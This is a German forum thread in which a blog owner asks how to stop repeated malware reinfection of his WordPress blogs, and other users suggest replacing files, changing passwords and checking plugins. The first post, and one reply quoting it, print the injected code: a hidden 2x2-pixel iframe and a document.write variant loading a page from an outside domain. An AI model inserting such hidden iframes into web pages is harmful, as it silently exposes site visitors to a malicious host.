Hilfe maleware

[sharif1403]

ich habe auf zwei blogs immer wieder dieselbe malware

Hidden Iframes.
Details: https://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="https://salealongedock.org/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

Known javascript malware.
Details: https://sucuri.net/malware/malware-entry-mwjs611
document.write('<iframe src="https://salealongedock.org/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

bei anderen die befallen waren, waren sie weg nachdem ich die alten themes alle gelöscht hatte und durch neue ersetzt. Was mach ich jetzt, dass das mistzeug nicht mehr wieder kommt. kann mir jemand was empfehlen?

[Unique Contents]

Step 1: Alle Files am Server (tpls. php etc) gegen "saubere" austauschen.
Step 2: Alle Passworter & Zugänge ändern

Sollte soweit helfen, solange du zb einzelne Files am Server beläßt oder die PWs nicht änderts, kommt der Mist immer wieder. Hatte ich selbst einmal mit Foren von mir, war sehr nervig als alle paar Tage die Foren voll Malware waren.

[sharif1403]

Datenbank auch plätten? ich muss dazu sagen ich hatte auch den netten virus am computer der den pc sperrt und mit dem hinweis man sollte doch bitte hundert euro überweisen

[Unique Contents]

Also es mag Leute geben, die sagen ein Check der DB reicht.
Meine persönliche Erfahrung zeigte mir das "alles Neu" meist der beste Weg ist. Zb brauchte ich 2 Anläufe um rauszufinden, dass bei mir der Hase im JS.Pfeffer lag

Also mein persönlicher Tipp, mach alles platt wenn du 100%ig sicher sein willst. Wenn du zb Artikel nicht verlieren willst, mach es erstmal ohne DB und warte ab ob das Problem wieder kommt.

Du kannst aber natürlich auch mit Tools testen ob bzw. wo das Problem liegt, ich weiß nur leider nicht wie genau die sind.

[Fensterklauer]

ich habe auf zwei blogs immer wieder dieselbe malware

Hidden Iframes.
Details: https://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="https://salealongedock.org/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

Known javascript malware.
Details: https://sucuri.net/malware/malware-entry-mwjs611
document.write('<iframe src="https://salealongedock.org/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

bei anderen die befallen waren, waren sie weg nachdem ich die alten themes alle gelöscht hatte und durch neue ersetzt. Was mach ich jetzt, dass das mistzeug nicht mehr wieder kommt. kann mir jemand was empfehlen?

Hatte ich letzte Woche auch auf einigen meiner WP Blogs. Der Code war kurz vor head() ?php> eingebaut. Nachdem ich den Code entfernt hatte, brauchte es ca. 2-3 Tage danach war alles wieder da. Komischerweise nur 4/20 Blogs und nicht alle. Daher schließe ich mein Mac-System als Ursache erstmal aus. Habe zur Sicherheit alle PW geändert und werde das ganze mal beobachten.

Welche Plugins (wenn du Wordpress nutzt) hast du denn am laufen? Vielleicht liegt es auch daran?

[sharif1403]

ja daran hab ich auch gedacht, weil ich auch noch blogs bei einem anderen provider habe und da ist gar nichts. Das nervt aber mit dem Teil. Kann mir vielleicht noch jemand ein plugin oder nen nettes tool empfehlen, wie man die Texte sicher kann ohne datenbank oder so?

MFG sharif

[Lika]

Hatte auch schonmal das Problem. Hab aber nur den Code entfernt und die Passwörter ausgetauscht. Das reichte dann auch schon.

Wenn du allerdings nen verseuchten PC hast, würd ich erstmal den reinigen und dann die Aktualisierungen machen. Sonst entfernst du das Ganze und hast es eigentlich gleich schon wieder drauf

[sharif1403]

Ich weiß jetzt warum Google mit den Seiten ein Problem hat. Ganz einfache Sache, habe die Index.php verschoben um es den nächsten Virus schwerer zu machen oder einem Angriff von außen. Die index.php liegt jetzt in einem anderen Ordner und genau diese wird von Google als Virus erkannt

Also echt, Google hat doch wirklich einen Schlag